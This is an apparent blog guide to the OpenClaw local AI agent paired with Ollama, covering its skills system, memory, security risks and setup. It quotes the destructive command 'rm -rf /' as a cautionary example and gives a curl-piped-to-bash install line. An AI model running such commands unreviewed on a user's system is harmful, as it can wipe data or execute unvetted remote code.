A practical security guide to building your own local AI assistant one that installs skills, remembers context, and executes tasks… but also comes with real risks.
For the last couple of years, AI assistants have felt a bit like brilliant interns.
They write beautiful code.
They draft emails faster than you can blink.
They summarize documents like a caffeinated librarian.
But ask them to actually do something, and suddenly the magic stops.
They’ll happily generate a deployment script… but they won’t run it.
They’ll debug your code… but you still have to copy-paste commands into the terminal.
They’ll write the perfect email… but you’re still the one clicking Send.
It’s like having a genius teammate who refuses to touch the keyboard.
Most of today’s AI tools live inside browser tabs ChatGPT, Claude, Gemini. They’re powerful, but they’re still just advisors. When the tab closes, the memory disappears. When the workflow changes, you start over.
And that’s why the new wave of AI agents is getting developers excited.
Instead of just answering prompts, an AI agent can actually operate tools, install capabilities, remember context, and execute tasks.
One of the most interesting projects in this space right now is OpenClaw an open-source AI agent that runs locally and can interact with tools, skills, and messaging platforms like Slack or Discord.
Pair it with Ollama, a runtime for running large language models locally, and suddenly you have something developers have been quietly dreaming about:
A personal AI assistant that runs on your own machine.
No API bills.
No cloud dependency.
No losing context when you close a tab.
Sounds amazing, right?
Well… there’s a catch.
An AI that can operate your computer also introduces a completely new category of security problems. Give the wrong agent the wrong permissions, and your helpful assistant suddenly has the power to access files, run commands, or install code you didn’t review.
In other words, the moment AI stops being a chatbot and becomes an operator, the stakes change.
So in this guide, we’ll walk through what OpenClaw actually is, how it works with Ollama, and how to run it safely without accidentally giving an AI root access to your laptop.
TL;DR
- OpenClaw is an open-source AI agent framework that can operate tools and run tasks locally.
- Ollama lets you run open-source LLMs on your own machine.
- Together they create a local AI assistant that can actually execute workflows.
- But because it has real system access, security matters a lot more than with normal chatbots.
Why local AI agents are suddenly everywhere
For a while, AI assistants felt like the ultimate developer sidekick.
Need boilerplate code? Done.
Need documentation summarized? Easy.
Need a quick regex that doesn’t melt your brain? AI’s got you.
But after the novelty wore off, a weird pattern started to appear.
AI tools were incredibly smart… yet strangely passive.
They could tell you what to do, but they couldn’t actually do it.
You’d ask ChatGPT to write a deployment script.
It would generate something beautiful.
Then you’d copy it into the terminal, run it, watch it fail, go back to the AI, repeat.
Developers basically became human copy-paste middleware.
It started to feel like having a brilliant teammate who refuses to touch the keyboard.
The browser tab problem
Most popular AI tools today live inside browser tabs.
- ChatGPT
- Claude
- Gemini
They’re powerful, but they all share the same limitations:
• Conversations reset easily
• Workflows break when context disappears
• Integrations are limited
• Everything depends on cloud APIs
Close the tab and your “AI coworker” basically forgets everything.
It’s like working with someone who develops amnesia every afternoon.
Developers want AI that actually acts
What developers really want isn’t just AI advice.
They want AI execution.
Instead of:
“Here’s the command you should run.”
They want:
“Command executed. Here’s the result.”
That’s where AI agents enter the picture.
An AI agent isn’t just a chatbot. It’s a system that can:
- Run commands
- Interact with tools
- Install capabilities
- Remember previous actions
- Complete multi-step workflows
Instead of being an advisor, the AI becomes an operator.
The local AI movement
At the same time, another shift started happening in the AI world:
developers began moving models back onto their own machines.
Tools like Ollama made it surprisingly easy to run large language models locally.
Instead of sending prompts to cloud APIs, you can run models like:
- Llama
- Mistral
- DeepSeek
directly on your laptop or workstation.
This brings a few huge advantages developers care about:
• No API costs
• Private data stays local
• Full control over models
• Persistent environments
For engineers who hate unpredictable cloud bills, this feels almost rebellious.
A small dev reality check
If you’ve ever tried automating a workflow with AI, you’ve probably experienced this moment.
You ask an AI to generate a script.
It works perfectly.
Then you realize you still need to:
- Copy the code
- Paste it into a file
- Run the command
- Fix errors
- Repeat the cycle
At some point you think:
“Why is the AI telling me what to type instead of typing it?”
That frustration is exactly why projects like OpenClaw started getting attention.
They’re trying to move AI from advice mode to action mode and that small shift changes everything.
How OpenClaw actually works
When people first hear about OpenClaw, they often assume it’s just another chatbot with a fancy name.
It’s not.
OpenClaw is closer to an AI operating system than a chat interface. Instead of just answering questions, it’s designed to receive requests, decide what tools are needed, execute them, and remember what happened.
In other words, it behaves more like an agent workflow engine than a prompt-response tool.
At a high level, the system works something like this:
User → Gateway → Agent → Skills/Tools → Memory → Response
Each of these layers has a specific role.
The gateway: where requests enter the system
OpenClaw doesn’t limit you to a single interface.
Instead, it runs a gateway service that accepts requests from different platforms. That means you can interact with your agent through tools you already use every day, like:
- Slack
- Discord
- APIs
- A local web dashboard
So instead of opening a new AI app, the agent can live inside your normal workflow.
Imagine asking a question in Slack:
“Generate a small landing page for our new feature and save it in the project repo.”
Instead of replying with code, the agent could actually:
- Generate the code
- Create the files
- Run formatting tools
- Commit the result
That’s the key difference between AI advice and AI action.
The layered prompt system
One of the most interesting design decisions in OpenClaw is that it doesn’t dump all context into a single prompt.
Instead, it uses a layered configuration system.
Inside the agent workspace you’ll find files like:
AGENTS.md
SOUL.md
IDENTITY.md
USER.md
memory/
TOOLS.md
Each file represents a different layer of context.
Think of it like a character sheet in a role-playing game.
SOUL.md
Defines personality, tone, and values.
IDENTITY.md
Defines the agent’s role and identity.
USER.md
Contains information about the user interacting with the system.
AGENTS.md
Defines operational rules and behavior priorities.
Instead of being mashed together randomly, OpenClaw loads these layers in a specific order so the model understands what matters most.
This helps reduce one of the biggest problems with LLM systems: context confusion.
Soft rules vs hard rules
Another clever part of the architecture is how OpenClaw handles the limitations of language models.
Prompts alone are unreliable.
LLMs don’t obey instructions the way software does. They treat prompts more like suggestions weighted by probability.
Research on prompt reliability has repeatedly highlighted this problem.
https://arxiv.org/abs/2302.12173
So OpenClaw separates rules into two categories.
Soft constraints
These come from prompts and instructions:
- Personality rules
- Role definitions
- Workflow guidelines
They influence the model’s behavior but don’t guarantee compliance.
Hard constraints
These are enforced by the system itself:
- Tool permissions
- Command restrictions
- Execution hooks
Even if the model tries something unsafe, the infrastructure can block it.
This hybrid approach is what makes OpenClaw behave more like a structured assistant rather than a free-form chatbot.
Persistent memory
Another major difference from normal AI chat tools is memory.
Instead of storing conversations in temporary sessions, OpenClaw writes interaction history to persistent logs.
For example:
memory/YYYY-MM-DD.mdin
These logs become part of the agent’s working knowledge.
Over time the assistant develops a history of interactions, decisions, and context, which means it can reference previous events instead of starting from zero every time.
Combine that with version control and configurable behavior, and suddenly the agent starts to feel less like a chatbot and more like a long-term collaborator living inside your system.

The strangest feature: the AI can upgrade itself
If OpenClaw were just an AI agent that runs locally, that alone would be interesting.
But the feature that really makes developers pause is something else entirely:
The agent can expand its own capabilities.
Not metaphorically.
Not through a plugin you manually install.
The agent can actually discover, install, and prioritize new skills depending on the task you ask it to complete.
The first time you see this happen, it feels a little like watching a program quietly teach itself a new trick.
The three layers of skills
OpenClaw organizes its abilities into three different layers.
Each layer represents a different source of capability.
Layer 1: bundled skills
These are the built-in abilities that ship with the agent.
Think of them as the default toolkit.
Typical bundled skills include things like:
- File operations
- Basic tool integrations
- Messaging interactions
- Simple automation tasks
They’re the equivalent of a programming language’s standard library.
Useful, reliable, and always available.
Layer 2: managed skills from ClawHub
The second layer comes from ClawHub, which works a bit like a package registry.
If a user asks the agent to perform a task it doesn’t already know how to do, OpenClaw can search this registry for a matching capability.
In other words, the agent doesn’t just fail the request.
It tries to find a skill that solves the problem.
A simple analogy is npm.
When a developer needs a library, they install it from a registry.
ClawHub works the same way, except the AI agent does the discovery itself.
That’s a subtle but powerful shift.
Instead of developers manually expanding the toolset, the agent can adapt its toolkit on demand.
Layer 3: workspace skills
The final layer is where things get interesting for developers.
Workspace skills are custom abilities defined by the user.
They live inside the OpenClaw workspace directory.
~/.openclaw/workspace/skills/
Each skill is defined using a simple markdown configuration file.
This makes it surprisingly easy to extend the agent’s behavior without writing a full plugin system.
You can essentially teach the assistant new workflows by describing them.
For example:
- Deployment scripts
- Build automation
- Internal project tasks
Workspace skills always take priority over other sources, which means the agent learns your environment first.
self-hackable behavior
Here’s the part that made many developers do a double take.
Because the agent can install and modify skills, it can sometimes improve its own capabilities while solving a task.
In one reported example, OpenClaw added authentication support for an editor integration after observing how the system authenticated elsewhere.
The agent effectively looked at an existing pattern and extended it.
When people first see that behavior, the reaction is usually the same:
“Wait… did it just modify its own system?”
Technically yes.
And that’s where things start to feel less like a chatbot and more like a software entity evolving inside your machine.
Git as the safety net
Fortunately, OpenClaw includes one very developer-friendly safety feature.
The entire workspace can be tracked using Git.
git init
git add AGENTS.md SOUL.md TOOLS.md memory/
git commit -m "Agent workspace initialized"
This means every change the agent makes to its environment is transparent and reversible.
If the agent learns something incorrect or installs a broken skill, you can simply roll it back.
git revert
That design decision turns what could be chaotic behavior into something developers already understand:
version-controlled evolution.
Instead of blindly trusting the AI, you can inspect and control its changes just like you would any other codebase.
And honestly, that single idea might be one of the smartest design choices in the entire system.
The security problem nobody likes to discuss
The moment an AI stops being a chatbot and starts acting like an operator, something important changes.
Chatbots are mostly harmless.
They generate text.
They suggest code.
They answer questions.
Worst case scenario, they hallucinate a bad answer and waste ten minutes of your time.
But an AI agent is different.
An AI agent can touch your system.
And that means the risks suddenly look very different.
When AI has real permissions
Think about what an AI agent like OpenClaw can potentially do if it has access to the right tools.
It might be able to:
- Read local files
- Execute shell commands
- Install packages
- Access APIs
- Interact with external services
That’s not theoretical that’s literally the point of the system.
The goal is to turn AI from something that talks about tasks into something that performs tasks.
But the moment you give an AI those capabilities, you’ve essentially handed it something developers normally guard very carefully:
system privileges.
Giving an AI agent broad permissions is a bit like giving a junior developer root access on their first day.
Maybe everything will go perfectly.
Or maybe something very surprising will happen.
The classic nightmare command
Every developer has seen this command at least once.
rm -rf /
It’s basically the nuclear option in a Unix environment — delete everything from the root directory downward.
Now imagine an AI agent with command execution privileges misunderstanding a prompt, misinterpreting context, or running a script that wasn’t reviewed properly.
That’s why experienced engineers treat powerful automation tools with caution.
Automation is fantastic.
But automation without guardrails can turn into chaos.
The problem with third-party skills
Another risk comes from the agent’s skill ecosystem.
Some studies analyzing large collections of agent skills found that a surprising percentage contain vulnerabilities sometimes around a quarter of available skills.
That’s not unusual in software ecosystems.
But when those skills can potentially interact with your file system, environment variables, or APIs, the stakes become higher.
Installing a skill without reviewing its code is basically the same as running an unknown script on your machine.
And every developer knows how that story usually ends.
Basic security rules that matter
If you plan to experiment with OpenClaw or similar AI agents, a few simple rules can dramatically reduce the risk.
1. Enable gateway authentication
The gateway should never accept requests without verification.
You can run a quick diagnostic check:
openclaw doctor
If the system reports warnings, fix them before exposing the agent to other tools.
2. Never expose the agent directly to the internet
Many early security issues with agent systems come from reverse proxy setups or exposed APIs.
A much safer approach is:
- Run the agent locally
- Access it through a VPN
- Keep it inside your private network
Treat it like any other sensitive internal service.
3. Review skills before installing them
Just because a skill exists in a registry doesn’t mean it’s safe.
Before installing anything that interacts with your system:
- Read the source code
- Check what commands it executes
- Verify what permissions it uses
It’s the same process you’d use before running any unfamiliar script.
4. Run agents inside a sandbox
Many developers choose to run experimental AI agents inside:
- Virtual machines
- Containers
- Isolated environments
That way, if something unexpected happens, it doesn’t affect your main workstation.
This is especially important if the agent has file or command access.
The developer instinct: use a test machine
One of the most common pieces of advice you’ll hear from engineers experimenting with AI agents is simple.
Don’t install them on your primary machine first.
Spin up a test environment.
Maybe a spare laptop.
Maybe a virtual machine.
Maybe a small local server.
Treat it like any other experimental infrastructure.
Because once an AI system can run commands, access files, and install tools, it stops being just another piece of software.
It becomes something closer to a semi-autonomous process living inside your system.
And that’s exactly what makes it both exciting and a little bit terrifying.
Setting up OpenClaw + Ollama locally (without breaking your machine)
If you’ve read this far, you’re probably thinking the same thing most developers do:
“Okay… this sounds cool. How hard is it to try?”
Surprisingly, getting OpenClaw running is not that complicated. The project provides a pretty straightforward installation process, and most of the heavy lifting happens during the onboarding wizard.
Still, there are a few things worth knowing before you run the first command.
Step one: make sure your environment is ready
Before installing OpenClaw, you’ll need a recent version of Node.js.
The project currently requires Node.js 22 or newer, so if your machine is running an older version, update that first.
Once Node is installed, the installation command itself is simple.
curl -fsSL https://molt.bot/install.sh | bash
That script downloads the OpenClaw runtime and prepares the workspace on your machine.
If everything goes well, you’ll soon be greeted by the onboarding wizard.
The onboarding wizard
The onboarding process is where most of the configuration happens.
During setup, OpenClaw will ask you about things like:
- Which port the gateway should run on
- Where the workspace directory should live
- What skills should be installed
- Which model providers you want to connect
This wizard essentially builds the initial agent environment.
Think of it like configuring a new development environment except the “developer” is an AI agent.
Once onboarding finishes, OpenClaw installs its gateway service so the agent can start automatically when your system boots.
At that point, your machine basically becomes a home base for your personal AI assistant.
Adding a model with Ollama
Of course, the agent still needs a brain.
That’s where Ollama comes in.
Ollama makes it easy to run large language models locally without dealing with complicated inference setups.
After installing Ollama, you can download a model with a single command.
ollama pull gpt-oss:20b
Once the model is available locally, you can connect it to OpenClaw.
ollama launch openclaw
Now the agent has a local language model powering its reasoning.
One detail worth mentioning is context length. Agent systems often need a larger context window than simple chatbots because they load multiple layers of instructions and memory.
Many developers recommend increasing the context window to something like 64k tokens so the agent can process larger workflows.
Enabling web tools
By default, OpenClaw doesn’t automatically know how to browse the web or fetch external data.
Those features need to be configured manually.
The configuration wizard lets you set up things like:
- Web search APIs
- Web fetch tools
- External integrations
You can adjust those settings later using the configuration command.
openclaw configure
Once those tools are connected, the agent gains the ability to look up information, retrieve pages, and integrate external services as part of its workflow.
Think of it like onboarding a teammate
A helpful way to think about OpenClaw is that you’re not just installing software you’re onboarding a new team member.
You need to decide:
- What tools they can access
- What permissions they have
- Where they can operate
- What tasks they should handle
Give them too little access, and they can’t do much.
Give them too much access, and things might get… interesting.
That balance between capability and control is what ultimately determines whether your local AI assistant becomes a powerful tool or just another experimental project sitting quietly on your machine.
So… do we actually need AI agents?
After spending time experimenting with OpenClaw, I ended up with a strange mix of excitement and skepticism.
On one hand, the idea is genuinely fascinating.
A local AI agent that can remember context, install new skills, run tools, and interact with your workflow tools starts to feel less like a chatbot and more like a digital teammate living inside your machine.
But on the other hand, many engineers might honestly ask:
Do we really need this?
If you’re already comfortable with tools like Claude Code or traditional CLI workflows, you might already have everything you need.
A strong command line plus a powerful AI coding assistant can already automate a surprising amount of work.
For many developers, that combination is enough.
Where agents start to make sense
Where AI agents start to become interesting is when they expand beyond the developer.
Imagine a small team where not everyone writes code.
Product managers, designers, or team leads might want to ask questions like:
What changed in the last release?
What’s the current status of this project?
Generate a quick summary of the latest pull requests.
Normally those questions interrupt a developer.
But with a local AI agent connected to the project workspace, those answers could be available instantly.
Instead of digging through Slack threads, Git history, or documentation, the team could simply ask the assistant.
In that scenario, the agent becomes something new:
a shared memory layer for the team.
The rise of personal AI infrastructure
Another reason agents are attracting attention is the growing trend toward personal AI infrastructure.
Developers are increasingly running models locally using tools like Ollama instead of relying entirely on cloud APIs.
This has a few big advantages:
- Lower long-term costs
- Better privacy
- Full control over the models
- Persistent environments
Combine that with an agent framework like OpenClaw, and suddenly your laptop or workstation can act like a personal AI server.
Some developers are even running these setups on small machines like a Mac mini or a home server so the agent stays online all the time.
The idea is simple: instead of opening an AI tool in a browser, you have an AI system that lives alongside your workflow.
A small shift that might change everything
Right now, AI still feels like a tool we open when we need help.
We ask a question, get an answer, and move on.
But agents suggest a different future.
Instead of asking AI for advice, we might eventually delegate tasks to it.
Not just writing code.
But managing workflows, coordinating tools, and handling routine operations.
That’s a small conceptual shift, but it changes how we think about software.
For decades, the browser became the interface to the internet.
If AI agents keep evolving, they might become something similar:
the interface between humans and the systems we build.
And if that future actually happens, projects like OpenClaw may end up being remembered as some of the earliest experiments that showed what a personal AI agent could look like.
Just… maybe test it on a spare machine first.
Helpful resources
- GitHub: https://github.com/openclaw/openclaw
- Installation and workspace documentation: https://github.com/openclaw/openclaw/wiki
- Official site: https://ollama.com
- GitHub: https://github.com/ollama/ollama
- Research paper: https://arxiv.org/abs/2302.12173
- Docs: https://docs.anthropic.com
Top comments (0)